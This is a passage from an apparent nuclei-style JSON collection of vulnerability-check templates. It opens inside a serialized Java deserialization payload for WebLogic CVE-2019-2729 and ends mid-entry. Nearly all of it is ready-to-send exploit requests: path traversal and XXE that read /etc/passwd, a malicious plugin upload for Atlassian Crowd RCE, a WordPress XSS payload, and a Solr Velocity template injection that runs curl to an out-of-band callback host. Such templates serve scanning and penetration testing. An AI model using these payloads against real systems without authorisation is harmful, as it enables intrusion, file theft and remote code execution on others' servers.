index=\"2860\"><byte>121</byte></void><void index=\"2861\"><byte>108</byte></void><void index=\"2862\"><byte>111</byte></void><void index=\"2863\"><byte>97</byte></void><void index=\"2864\"><byte>100</byte></void><void index=\"2865\"><byte>115</byte></void><void index=\"2866\"><byte>47</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>116</byte></void><void index=\"2869\"><byte>105</byte></void><void index=\"2870\"><byte>108</byte></void><void index=\"2871\"><byte>47</byte></void><void index=\"2872\"><byte>71</byte></void><void index=\"2873\"><byte>97</byte></void><void index=\"2874\"><byte>100</byte></void><void index=\"2875\"><byte>103</byte></void><void index=\"2876\"><byte>101</byte></void><void index=\"2877\"><byte>116</byte></void><void index=\"2878\"><byte>115</byte></void><void index=\"2879\"><byte>36</byte></void><void index=\"2880\"><byte>70</byte></void><void index=\"2881\"><byte>111</byte></void><void index=\"2882\"><byte>111</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>16</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>108</byte></void><void index=\"2892\"><byte>97</byte></void><void index=\"2893\"><byte>110</byte></void><void index=\"2894\"><byte>103</byte></void><void index=\"2895\"><byte>47</byte></void><void index=\"2896\"><byte>79</byte></void><void index=\"2897\"><byte>98</byte></void><void index=\"2898\"><byte>106</byte></void><void index=\"2899\"><byte>101</byte></void><void index=\"2900\"><byte>99</byte></void><void index=\"2901\"><byte>116</byte></void><void index=\"2902\"><byte>1</byte></void><void index=\"2903\"><byte>0</byte></void><void index=\"2904\"><byte>20</byte></void><void index=\"2905\"><byte>106</byte></void><void index=\"2906\"><byte>97</byte></void><void index=\"2907\"><byte>118</byte></void><void index=\"2908\"><byte>97</byte></void><void index=\"2909\"><byte>47</byte></void><void index=\"2910\"><byte>105</byte></void><void index=\"2911\"><byte>111</byte></void><void index=\"2912\"><byte>47</byte></void><void index=\"2913\"><byte>83</byte></void><void index=\"2914\"><byte>101</byte></void><void index=\"2915\"><byte>114</byte></void><void index=\"2916\"><byte>105</byte></void><void index=\"2917\"><byte>97</byte></void><void index=\"2918\"><byte>108</byte></void><void index=\"2919\"><byte>105</byte></void><void index=\"2920\"><byte>122</byte></void><void index=\"2921\"><byte>97</byte></void><void index=\"2922\"><byte>98</byte></void><void index=\"2923\"><byte>108</byte></void><void index=\"2924\"><byte>101</byte></void><void index=\"2925\"><byte>1</byte></void><void index=\"2926\"><byte>0</byte></void><void index=\"2927\"><byte>31</byte></void><void index=\"2928\"><byte>121</byte></void><void index=\"2929\"><byte>115</byte></void><void index=\"2930\"><byte>111</byte></void><void index=\"2931\"><byte>115</byte></void><void index=\"2932\"><byte>101</byte></void><void index=\"2933\"><byte>114</byte></void><void index=\"2934\"><byte>105</byte></void><void index=\"2935\"><byte>97</byte></void><void index=\"2936\"><byte>108</byte></void><void index=\"2937\"><byte>47</byte></void><void index=\"2938\"><byte>112</byte></void><void index=\"2939\"><byte>97</byte></void><void index=\"2940\"><byte>121</byte></void><void index=\"2941\"><byte>108</byte></void><void index=\"2942\"><byte>111</byte></void><void index=\"2943\"><byte>97</byte></void><void index=\"2944\"><byte>100</byte></void><void index=\"2945\"><byte>115</byte></void><void index=\"2946\"><byte>47</byte></void><void index=\"2947\"><byte>117</byte></void><void index=\"2948\"><byte>116</byte></void><void index=\"2949\"><byte>105</byte></void><void index=\"2950\"><byte>108</byte></void><void index=\"2951\"><byte>47</byte></void><void index=\"2952\"><byte>71</byte></void><void index=\"2953\"><byte>97</byte></void><void index=\"2954\"><byte>100</byte></void><void index=\"2955\"><byte>103</byte></void><void index=\"2956\"><byte>101</byte></void><void index=\"2957\"><byte>116</byte></void><void index=\"2958\"><byte>115</byte></void><void index=\"2959\"><byte>0</byte></void><void index=\"2960\"><byte>33</byte></void><void index=\"2961\"><byte>0</byte></void><void index=\"2962\"><byte>2</byte></void><void index=\"2963\"><byte>0</byte></void><void index=\"2964\"><byte>3</byte></void><void index=\"2965\"><byte>0</byte></void><void index=\"2966\"><byte>1</byte></void><void index=\"2967\"><byte>0</byte></void><void index=\"2968\"><byte>4</byte></void><void index=\"2969\"><byte>0</byte></void><void index=\"2970\"><byte>1</byte></void><void index=\"2971\"><byte>0</byte></void><void index=\"2972\"><byte>26</byte></void><void index=\"2973\"><byte>0</byte></void><void index=\"2974\"><byte>5</byte></void><void index=\"2975\"><byte>0</byte></void><void index=\"2976\"><byte>6</byte></void><void index=\"2977\"><byte>0</byte></void><void index=\"2978\"><byte>1</byte></void><void index=\"2979\"><byte>0</byte></void><void index=\"2980\"><byte>7</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>0</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>2</byte></void><void index=\"2985\"><byte>0</byte></void><void index=\"2986\"><byte>8</byte></void><void index=\"2987\"><byte>0</byte></void><void index=\"2988\"><byte>1</byte></void><void index=\"2989\"><byte>0</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>10</byte></void><void index=\"2993\"><byte>0</byte></void><void index=\"2994\"><byte>11</byte></void><void index=\"2995\"><byte>0</byte></void><void index=\"2996\"><byte>1</byte></void><void index=\"2997\"><byte>0</byte></void><void index=\"2998\"><byte>12</byte></void><void index=\"2999\"><byte>0</byte></void><void index=\"3000\"><byte>0</byte></void><void index=\"3001\"><byte>0</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>0</byte></void><void index=\"3004\"><byte>1</byte></void><void index=\"3005\"><byte>0</byte></void><void index=\"3006\"><byte>1</byte></void><void index=\"3007\"><byte>0</byte></void><void index=\"3008\"><byte>0</byte></void><void index=\"3009\"><byte>0</byte></void><void index=\"3010\"><byte>5</byte></void><void index=\"3011\"><byte>42</byte></void><void index=\"3012\"><byte>-73</byte></void><void index=\"3013\"><byte>0</byte></void><void index=\"3014\"><byte>1</byte></void><void index=\"3015\"><byte>-79</byte></void><void index=\"3016\"><byte>0</byte></void><void index=\"3017\"><byte>0</byte></void><void index=\"3018\"><byte>0</byte></void><void index=\"3019\"><byte>2</byte></void><void index=\"3020\"><byte>0</byte></void><void index=\"3021\"><byte>13</byte></void><void index=\"3022\"><byte>0</byte></void><void index=\"3023\"><byte>0</byte></void><void index=\"3024\"><byte>0</byte></void><void index=\"3025\"><byte>6</byte></void><void index=\"3026\"><byte>0</byte></void><void index=\"3027\"><byte>1</byte></void><void index=\"3028\"><byte>0</byte></void><void index=\"3029\"><byte>0</byte></void><void index=\"3030\"><byte>0</byte></void><void index=\"3031\"><byte>54</byte></void><void index=\"3032\"><byte>0</byte></void><void index=\"3033\"><byte>14</byte></void><void index=\"3034\"><byte>0</byte></void><void index=\"3035\"><byte>0</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>12</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>1</byte></void><void index=\"3040\"><byte>0</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>0</byte></void><void index=\"3043\"><byte>5</byte></void><void index=\"3044\"><byte>0</byte></void><void index=\"3045\"><byte>15</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>18</byte></void><void index=\"3048\"><byte>0</byte></void><void index=\"3049\"><byte>0</byte></void><void index=\"3050\"><byte>0</byte></void><void index=\"3051\"><byte>2</byte></void><void index=\"3052\"><byte>0</byte></void><void index=\"3053\"><byte>19</byte></void><void index=\"3054\"><byte>0</byte></void><void index=\"3055\"><byte>0</byte></void><void index=\"3056\"><byte>0</byte></void><void index=\"3057\"><byte>2</byte></void><void index=\"3058\"><byte>0</byte></void><void index=\"3059\"><byte>20</byte></void><void index=\"3060\"><byte>0</byte></void><void index=\"3061\"><byte>17</byte></void><void index=\"3062\"><byte>0</byte></void><void index=\"3063\"><byte>0</byte></void><void index=\"3064\"><byte>0</byte></void><void index=\"3065\"><byte>10</byte></void><void index=\"3066\"><byte>0</byte></void><void index=\"3067\"><byte>1</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>2</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>22</byte></void><void index=\"3072\"><byte>0</byte></void><void index=\"3073\"><byte>16</byte></void><void index=\"3074\"><byte>0</byte></void><void index=\"3075\"><byte>9</byte></void><void index=\"3076\"><byte>112</byte></void><void index=\"3077\"><byte>116</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>4</byte></void><void index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /crowd/admin/uploadplugin.action HTTP/2\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7\nExpect: 100-continue\n\n------------------------------f15fe87e95a7\nContent-Disposition: form-data; name=\"file_cdl\"; filename=\"rce.jar\"\nContent-Type: application/octet-stream\n\n{{plugin}}\n------------------------------f15fe87e95a7--\n","GET /crowd/plugins/servlet/exp HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2019-11580"]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST 